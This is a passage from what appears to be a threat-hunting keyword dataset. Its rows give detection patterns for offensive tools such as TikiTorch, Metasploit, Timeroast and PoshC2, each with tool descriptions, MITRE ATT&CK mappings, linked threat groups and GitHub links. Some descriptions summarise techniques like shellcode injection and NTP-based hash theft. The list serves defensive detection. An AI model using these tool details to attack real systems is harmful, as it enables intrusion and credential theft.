Sandworm","C2","https://github.com/rkervella/CarbonMonoxide","1","1","N/A","N/A","10","10","25","10","2020-05-28T10:40:20Z","2020-05-15T09:32:25Z","61336" "*TikiLoader.Injector*",".{0,1000}TikiLoader\.Injector.{0,1000}","offensive_tool_keyword","cobaltstrike","TikiTorch was named in homage to CACTUSTORCH by Vincent Yiu. The basic concept of CACTUSTORCH is that it spawns a new process. allocates a region of memory. writes shellcode into that region. and then uses CreateRemoteThread to execute said shellcode. Both the process and shellcode are specified by the user. The primary use case is as a JavaScript/VBScript loader via DotNetToJScript. 
which can be utilised in a variety of payload types such as HTA and VBA.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/rasta-mouse/TikiTorch","1","1","N/A","N/A","10","10","761","139","2021-10-24T10:29:46Z","2019-02-19T14:49:17Z","61337" "*TikiLoader\TikiLoader*",".{0,1000}TikiLoader\\TikiLoader.{0,1000}","offensive_tool_keyword","cobaltstrike","TikiTorch was named in homage to CACTUSTORCH by Vincent Yiu. The basic concept of CACTUSTORCH is that it spawns a new process. allocates a region of memory. writes shellcode into that region. and then uses CreateRemoteThread to execute said shellcode. 
Both the process and shellcode are specified by the user. The primary use case is as a JavaScript/VBScript loader via DotNetToJScript. which can be utilised in a variety of payload types such as HTA and VBA.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/rasta-mouse/TikiTorch","1","0","N/A","N/A","10","10","761","139","2021-10-24T10:29:46Z","2019-02-19T14:49:17Z","61338" "*TikiSpawn.dll*",".{0,1000}TikiSpawn\.dll.{0,1000}","offensive_tool_keyword","cobaltstrike","TikiTorch was named in homage to CACTUSTORCH by Vincent Yiu. The basic concept of CACTUSTORCH is that it spawns a new process. 
allocates a region of memory. writes shellcode into that region. and then uses CreateRemoteThread to execute said shellcode. Both the process and shellcode are specified by the user. The primary use case is as a JavaScript/VBScript loader via DotNetToJScript. which can be utilised in a variety of payload types such as HTA and VBA.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/rasta-mouse/TikiTorch","1","1","N/A","N/A","10","10","761","139","2021-10-24T10:29:46Z","2019-02-19T14:49:17Z","61339" "*TikiSpawn.exe*",".{0,1000}TikiSpawn\.exe.{0,1000}","offensive_tool_keyword","cobaltstrike","TikiTorch was named in homage 
to CACTUSTORCH by Vincent Yiu. The basic concept of CACTUSTORCH is that it spawns a new process. allocates a region of memory. writes shellcode into that region. and then uses CreateRemoteThread to execute said shellcode. Both the process and shellcode are specified by the user. The primary use case is as a JavaScript/VBScript loader via DotNetToJScript. which can be utilised in a variety of payload types such as HTA and VBA.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/rasta-mouse/TikiTorch","1","1","N/A","N/A","10","10","761","139","2021-10-24T10:29:46Z","2019-02-19T14:49:17Z","61340" 
"*TikiSpawn.ps1*",".{0,1000}TikiSpawn\.ps1.{0,1000}","offensive_tool_keyword","cobaltstrike","TikiTorch was named in homage to CACTUSTORCH by Vincent Yiu. The basic concept of CACTUSTORCH is that it spawns a new process. allocates a region of memory. writes shellcode into that region. and then uses CreateRemoteThread to execute said shellcode. Both the process and shellcode are specified by the user. The primary use case is as a JavaScript/VBScript loader via DotNetToJScript. which can be utilised in a variety of payload types such as HTA and VBA.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - 
Sandworm","C2","https://github.com/rasta-mouse/TikiTorch","1","1","N/A","N/A","10","10","761","139","2021-10-24T10:29:46Z","2019-02-19T14:49:17Z","61341" "*TikiSpawnAs*",".{0,1000}TikiSpawnAs.{0,1000}","offensive_tool_keyword","cobaltstrike","TikiTorch was named in homage to CACTUSTORCH by Vincent Yiu. The basic concept of CACTUSTORCH is that it spawns a new process. allocates a region of memory. writes shellcode into that region. and then uses CreateRemoteThread to execute said shellcode. Both the process and shellcode are specified by the user. The primary use case is as a JavaScript/VBScript loader via DotNetToJScript. which can be utilised in a variety of payload types such as HTA and VBA.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - 
Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/rasta-mouse/TikiTorch","1","1","N/A","N/A","10","10","761","139","2021-10-24T10:29:46Z","2019-02-19T14:49:17Z","61342" "*TikiSpawnAsAdmin*",".{0,1000}TikiSpawnAsAdmin.{0,1000}","offensive_tool_keyword","cobaltstrike","TikiTorch was named in homage to CACTUSTORCH by Vincent Yiu. The basic concept of CACTUSTORCH is that it spawns a new process. allocates a region of memory. writes shellcode into that region. and then uses CreateRemoteThread to execute said shellcode. Both the process and shellcode are specified by the user. The primary use case is as a JavaScript/VBScript loader via DotNetToJScript. which can be utilised in a variety of payload types such as HTA and VBA.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - 
Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/rasta-mouse/TikiTorch","1","1","N/A","N/A","10","10","761","139","2021-10-24T10:29:46Z","2019-02-19T14:49:17Z","61343" "*TikiSpawnElevated*",".{0,1000}TikiSpawnElevated.{0,1000}","offensive_tool_keyword","cobaltstrike","TikiTorch was named in homage to CACTUSTORCH by Vincent Yiu. The basic concept of CACTUSTORCH is that it spawns a new process. allocates a region of memory. writes shellcode into that region. and then uses CreateRemoteThread to execute said shellcode. Both the process and shellcode are specified by the user. The primary use case is as a JavaScript/VBScript loader via DotNetToJScript. which can be utilised in a variety of payload types such as HTA and VBA.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - 
Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/rasta-mouse/TikiTorch","1","1","N/A","N/A","10","10","761","139","2021-10-24T10:29:46Z","2019-02-19T14:49:17Z","61344" "*TikiSpawnWOppid*",".{0,1000}TikiSpawnWOppid.{0,1000}","offensive_tool_keyword","cobaltstrike","TikiTorch was named in homage to CACTUSTORCH by Vincent Yiu. The basic concept of CACTUSTORCH is that it spawns a new process. allocates a region of memory. writes shellcode into that region. and then uses CreateRemoteThread to execute said shellcode. Both the process and shellcode are specified by the user. The primary use case is as a JavaScript/VBScript loader via DotNetToJScript. which can be utilised in a variety of payload types such as HTA and VBA.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca 
- EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/rasta-mouse/TikiTorch","1","1","N/A","N/A","10","10","761","139","2021-10-24T10:29:46Z","2019-02-19T14:49:17Z","61345" "*TikiSpawnWppid*",".{0,1000}TikiSpawnWppid.{0,1000}","offensive_tool_keyword","cobaltstrike","TikiTorch was named in homage to CACTUSTORCH by Vincent Yiu. The basic concept of CACTUSTORCH is that it spawns a new process. allocates a region of memory. writes shellcode into that region. and then uses CreateRemoteThread to execute said shellcode. Both the process and shellcode are specified by the user. The primary use case is as a JavaScript/VBScript loader via DotNetToJScript. 
which can be utilised in a variety of payload types such as HTA and VBA.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/rasta-mouse/TikiTorch","1","1","N/A","N/A","10","10","761","139","2021-10-24T10:29:46Z","2019-02-19T14:49:17Z","61346" "*TikiTorch.exe*",".{0,1000}TikiTorch\.exe.{0,1000}","offensive_tool_keyword","cobaltstrike","TikiTorch was named in homage to CACTUSTORCH by Vincent Yiu. The basic concept of CACTUSTORCH is that it spawns a new process. allocates a region of memory. writes shellcode into that region. and then uses CreateRemoteThread to execute said shellcode. 
Both the process and shellcode are specified by the user. The primary use case is as a JavaScript/VBScript loader via DotNetToJScript. which can be utilised in a variety of payload types such as HTA and VBA.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/rasta-mouse/TikiTorch","1","1","N/A","N/A","10","10","761","139","2021-10-24T10:29:46Z","2019-02-19T14:49:17Z","61347" "*TikiVader.*",".{0,1000}TikiVader\..{0,1000}","offensive_tool_keyword","cobaltstrike","TikiTorch was named in homage to CACTUSTORCH by Vincent Yiu. The basic concept of CACTUSTORCH is that it spawns a new process. allocates a region of memory. 
writes shellcode into that region. and then uses CreateRemoteThread to execute said shellcode. Both the process and shellcode are specified by the user. The primary use case is as a JavaScript/VBScript loader via DotNetToJScript. which can be utilised in a variety of payload types such as HTA and VBA.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/rasta-mouse/TikiTorch","1","1","N/A","N/A","10","10","761","139","2021-10-24T10:29:46Z","2019-02-19T14:49:17Z","61348" "*timemachine_cmd_injection*",".{0,1000}timemachine_cmd_injection.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. 
open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","FANCY BEAR - EMBER BEAR - Sandworm - Turla - MAZE - LockBit - Bassterlord* - Conti - Hive - Fog - Black Basta - MoneyTaker - INDRIK SPIDER - APT39 - GOLD DUPONT - Common Raven","Framework","https://github.com/rapid7/metasploit-framework","1","1","N/A","N/A","10","10","35400","14272","2025-04-22T20:14:59Z","2011-08-30T06:13:20Z","61349" "*timeroast.ps1*",".{0,1000}timeroast\.ps1.{0,1000}","offensive_tool_keyword","Timeroast","Timeroasting takes advantage of Windows NTP authentication mechanism allowing unauthenticated attackers to effectively request a password hash of any computer or trust account by sending an NTP request with that account's RID","T1558.003 - T1059.003 - T1078.004","TA0006 - TA0002 - TA0004","N/A","N/A","Credential Access","https://github.com/SecuraBV/Timeroast","1","1","N/A","N/A","10","3","282","28","2023-07-04T07:12:57Z","2023-01-18T09:04:05Z","61350" "*timeroast.py*",".{0,1000}timeroast\.py.{0,1000}","offensive_tool_keyword","Timeroast","Timeroasting takes advantage of Windows NTP authentication mechanism allowing unauthenticated attackers to effectively request a password hash of any computer or trust account by sending an NTP request with 
that account's RID","T1558.003 - T1059.003 - T1078.004","TA0006 - TA0002 - TA0004","N/A","N/A","Credential Access","https://github.com/SecuraBV/Timeroast","1","1","N/A","N/A","10","3","282","28","2023-07-04T07:12:57Z","2023-01-18T09:04:05Z","61351" "*timestomp c:*",".{0,1000}timestomp\sc\:.{0,1000}","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and Lateral Movement.","T1548.002 - T1134 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0004 - TA0008 - TA0009 - TA0011 - TA0006 - TA0003 - TA0007 - TA0005 - TA0010","N/A","Black Basta - APT33 - HEXANE - Sandworm - Dispossessor","C2","https://github.com/nettitude/PoshC2","1","0","N/A","N/A","10","10","1908","340","2025-03-06T11:10:20Z","2018-07-23T08:53:32Z","61352" 